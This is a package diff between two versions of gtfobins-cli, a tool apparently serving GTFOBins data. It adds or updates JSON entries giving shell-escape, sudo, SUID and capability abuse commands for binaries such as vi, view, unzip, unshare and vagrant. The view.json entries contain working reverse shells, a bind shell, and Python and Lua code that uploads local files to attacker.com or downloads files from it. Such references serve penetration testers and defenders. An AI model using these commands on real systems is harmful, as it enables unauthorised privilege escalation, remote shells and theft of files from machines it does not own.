gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/uniq.json

@@ -1,20 +1,22 @@
 {
-  "description": "The read file content is corrupted by squashing multiple adjacent lines.",
   "functions": {
     "file-read": [
       {
-        "code": "uniq [file]\n"
+        
+        "code": "LFILE=file_to_read\nuniq \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./uniq [file]\n"
+        
+        "code": "LFILE=file_to_read\n./uniq \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo uniq [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo uniq \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/unshare.json

@@ -2,18 +2,21 @@
   "functions": {
     "shell": [
       {
-        "code": "unshare /bin/sh"
+        
+        "code": "unshare /bin/sh\n"
       }
     ],
     "suid": [
       {
-        "code": "./unshare -r /bin/sh"
+        
+        "code": "./unshare -r /bin/sh\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo unshare /bin/sh"
+        
+        "code": "sudo unshare /bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/unsquashfs.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        
+        "code": "sudo unsquashfs shell\n./squashfs-root/sh -p\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./unsquashfs shell\n./squashfs-root/sh -p\n"
+      }
+    ]
+  }
+}

gtfo/data/unzip.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        
+        "code": "sudo unzip -K shell.zip\n./sh -p\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./unzip -K shell.zip\n./sh -p\n"
+      }
+    ]
+  }
+}

gtfo/data/update-alternatives.json

@@ -2,14 +2,14 @@
   "functions": {
     "sudo": [
       {
-        "description": "Write in [file] a symlink to $TF.",
-        "code": "TF=$(mktemp)\necho DATA >$TF\nsudo update-alternatives --force --install [file] x \"$TF\" 0\n"
+        "description": "Write in `$LFILE` a symlink to `$TF`.",
+        "code": "LFILE=/path/to/file_to_write\nTF=$(mktemp)\necho DATA >$TF\nsudo update-alternatives --force --install \"$LFILE\" x \"$TF\" 0\n"
       }
     ],
     "suid": [
       {
-        "description": "Write in [file] a symlink to $TF.",
-        "code": "TF=$(mktemp)\necho DATA >$TF\n./update-alternatives --force --install [file] x \"$TF\" 0\n"
+        "description": "Write in `$LFILE` a symlink to `$TF`.",
+        "code": "LFILE=/path/to/file_to_write\nTF=$(mktemp)\necho DATA >$TF\n./update-alternatives --force --install \"$LFILE\" x \"$TF\" 0\n"
       }
     ]
   }

gtfo/data/urlget.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system. The output might be corrupted or incomplete if the file does not follow the expected database format. Available in util-linux on CentOS, RHEL, Fedora.",
+        "code": "LFILE=file_to_read\n/usr/lib/aarch64-linux-gnu/gettext/urlget $LFILE $LFILE\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.",
+        "code": "LFILE=file_to_read\n/usr/lib/aarch64-linux-gnu/gettext/urlget $LFILE $LFILE\n"
+      }
+    ]
+  }
+}

gtfo/data/uudecode.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nuuencode \"$LFILE\" /dev/stdout | uudecode\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\nuuencode \"$LFILE\" /dev/stdout | uudecode\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo uuencode \"$LFILE\" /dev/stdout | uudecode\n"
+      }
+    ]
+  }
+}

gtfo/data/uuencode.json

@@ -1,19 +1,22 @@
 {
-	"functions": {
-		"file-read": [
-			{
-				"code": "uuencode \"[file]\" /dev/stdout | uudecode\n"
-			}
-		],
-		"suid": [
-			{
-				"code": "uuencode \"[file]\" /dev/stdout | uudecode\n"
-			}
-		],
-		"sudo": [
-			{
-				"code": "sudo uuencode \"[file]\" /dev/stdout | uudecode\n"
-			}
-		]
-	}
-}
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nuuencode \"$LFILE\" /dev/stdout | uudecode\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\nuuencode \"$LFILE\" /dev/stdout | uudecode\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo uuencode \"$LFILE\" /dev/stdout | uudecode\n"
+      }
+    ]
+  }
+}

gtfo/data/uv.json

@@ -0,0 +1,43 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "uv run cat /path/to/file-input\n",
+        "contexts": {
+          "sudo": {},
+          "suid": {},
+          "unprivileged": {}
+        }
+      }
+    ],
+    "file-write": [
+      {
+        "code": "uv run sh -c 'echo data > /path/to/file-output'\n",
+        "contexts": {
+          "sudo": {},
+          "suid": {},
+          "unprivileged": {}
+        }
+      }
+    ],
+    "inherit": [
+      {
+        "code": "uv run CMD\n",
+        "contexts": {
+          "unprivileged": {}
+        },
+        "from": "pip"
+      }
+    ],
+    "shell": [
+      {
+        "code": "uv run /bin/sh\n",
+        "contexts": {
+          "sudo": {},
+          "suid": {},
+          "unprivileged": {}
+        }
+      }
+    ]
+  }
+}

gtfo/data/vagrant.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "cd $(mktemp -d)\necho 'exec \"/bin/sh\"' > Vagrantfile\nvagrant up\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "cd $(mktemp -d)\necho 'exec \"/bin/sh\"' > Vagrantfile\nvagrant up\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "cd $(mktemp -d)\necho 'exec \"/bin/sh -p\"' > Vagrantfile\nvagrant up\n"
+      }
+    ]
+  }
+}

gtfo/data/valgrind.json

@@ -2,13 +2,15 @@
   "functions": {
     "shell": [
       {
-        "code": "valgrind /bin/sh"
+        
+        "code": "valgrind /bin/sh\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo valgrind /bin/sh"
+        
+        "code": "sudo valgrind /bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/varnishncsa.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_write\nsudo varnishncsa -g request -q 'ReqURL ~ \"/xxx\"' -F '%{yyy}i' -w \"$LFILE\"\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_write\n./varnishncsa -g request -q 'ReqURL ~ \"/xxx\"' -F '%{yyy}i' -w \"$LFILE\"\n"
+      }
+    ]
+  }
+}

gtfo/data/vi.json

@@ -1,28 +1,40 @@
 {
-  "description": "Modern Unix systems run 'vim' binary when 'vi' is called.",
   "functions": {
     "shell": [
       {
-        "code": "vi -c ':!/bin/sh' /dev/null"
+        
+        "code": "vi -c ':!/bin/sh' /dev/null\n"
       },
       {
+        
         "code": "vi\n:set shell=/bin/sh\n:shell\n"
+      },
+      {
+        
+        "code": "vi -c ':shell'"
+      },
+      {
+        
+        "code": "vi -c :terminal /bin/sh"
       }
     ],
     "file-write": [
       {
-        "code": "vi [file]\niDATA\n^[\nw\n"
+        
+        "code": "vi file_to_write\niDATA\n^[\nw\n"
       }
     ],
     "file-read": [
       {
-        "code": "vi [file]"
+        
+        "code": "vi file_to_read\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo vi -c ':!/bin/sh' /dev/null"
+        
+        "code": "sudo vi -c ':!/bin/sh' /dev/null\n"
       }
     ]
   }
-}
+}

gtfo/data/view.json

@@ -2,107 +2,112 @@
   "functions": {
     "shell": [
       {
-        "code": "view -c ':!/bin/sh'"
+        
+        "code": "view -c ':!/bin/sh'\n"
       },
       {
+        
         "code": "view\n:set shell=/bin/sh\n:shell\n"
       },
       {
-        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "view -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "view -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       },
       {
-        "description": "This requires that 'view' is compiled with Lua support.",
-        "code": "view -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `view` is compiled with Lua support.",
+        "code": "view -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "This requires that 'view' is compiled with Python support. Pr[e]pend ':py3' for Python 3. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
-        "code": "view -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
+        "description": "This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nview -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
       }
     ],
     "non-interactive-reverse-shell": [
       {
-        "description": "Run 'nc [host] [port]' on the attacker box to receive the shell. This requires that 'view' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "view -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\nt:connect(\"[host]\", [port]);\nwhile true do\n  local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));t:send(b);\nend;\nf:close();t:close();'\n"
+        "description": "Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires that `view` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nview -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\n  t:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
       }
     ],
     "non-interactive-bind-shell": [
       {
-        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell. This requires that 'view' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "view -c ':lua local k=require(\"socket\");\nlo[cal s=assert(k.bind(\"*\", [port]));\nlocal c=s:accept();\nwhile true do\n  local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));c:send(b);\nend;c:close();f:close();'\n"
+        "description": "Run `nc target.com 12345` on the attacker box to connect to the shell. This requires that `view` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export LPORT=12345\nview -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
       }
     ],
     "file-upload": [
       {
-        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3. Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
-        "code": "view -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[host]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))\nvim.command(\":q!\")'\n"
+        "description": "This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3. Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "export URL=http://attacker.com/\nexport LFILE=file_to_send\nview -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(e[\"URL\"], bytes(u.urlencode({\"d\":open(e[\"LFILE\"]).read()}).encode()))\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3. Serve files in the local folder running an HTTP server.",
-        "code": "view -c ':py import vim,sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
+        "description": "This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3. Serve files in the local folder running an HTTP server.",
+        "code": "export LPORT=8888\nview -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", int(e[\"LPORT\"])), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "Send a local file via TCP. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file. This requires that 'view' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "view -c ':lua local f=io.open(\"[file]\", \"rb\")\nlocal d=f:read(\"*a\")\nio.close(f);\nlocal s=require(\"socket\");\nlocal t=assert(s.tcp());\nt:connect(\"[host]\", [port]);\nt:send(d);\nt:close();'\n"
+        "description": "Send a local file via TCP. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker box to collect the file. This requires that `view` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LFILE=file_to_send\nview -c ':lua local f=io.open(os.getenv(\"LFILE\"), 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\n  t:send(d);\n  t:close();'\n"
       }
     ],
     "file-download": [
       {
-        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3. Fetch a remote file via HTTP GET request.",
-        "code": "view -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[host]\", \"[file]\")\nvim.command(\":q!\")'\n"
+        "description": "This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3. Fetch a remote file via HTTP GET request.",
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\nview -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(e[\"URL\"], e[\"LFILE\"])\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file. This requires that 'view' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "view -c ':lua local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\",\"[port]\"));\nlocal c=s:accept();\nlocal d,x=c:receive(\"*a\");\nc:close();\nlocal f=io.open(\"[file]\", \"wb\");\nf:write(d);\nio.close(f);'\n"
+        "description": "Fetch a remote file via TCP. Run `nc target.com 12345 < \"file_to_send\"` on the attacker box to send the file. This requires that `view` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export LPORT=12345\nexport LFILE=file_to_save\nview -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(os.getenv(\"LFILE\"), \"wb\");\n  f:write(d);\n  io.close(f);'\n"
       }
     ],
     "file-write": [
       {
-        "code": "view [file]\niDATA\n^[\nw!\n"
+        
+        "code": "view file_to_write\niDATA\n^[\nw!\n"
       }
     ],
     "file-read": [
       {
-        "code": "view [file]"
+        
+        "code": "view file_to_read\n"
       }
     ],
     "library-load": [
       {
-        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "view -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'"
+        "description": "This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "view -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'\n"
       }
     ],
     "suid": [
       {
-        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "./view -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
+        "description": "This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "./view -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo view -c ':!/bin/sh'"
+        
+        "code": "sudo view -c ':!/bin/sh'\n"
       },
       {
-        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "sudo view -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "sudo view -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       },
       {
-        "description": "This requires that 'view' is compiled with Lua support.",
-        "code": "sudo view -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `view` is compiled with Lua support.",
+        "code": "sudo view -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ],
     "capabilities": [
       {
-        "description": "This requires that 'view' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "./view -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "./view -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       }
     ],
     "limited-suid": [
       {
-        "description": "This requires that 'view' is compiled with Lua support.",
-        "code": "./view -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `view` is compiled with Lua support.",
+        "code": "./view -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ]
   }

gtfo/data/vigr.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "suid": [
+      {
+        
+        "code": "./vigr\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo vigr\n"
+      }
+    ]
+  }
+}